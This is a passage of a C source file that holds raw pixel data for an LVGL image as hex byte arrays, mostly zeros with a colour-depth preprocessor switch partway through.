0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x6b, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb5, 0x76, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, #endif #if LV_COLOR_DEPTH == 32 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 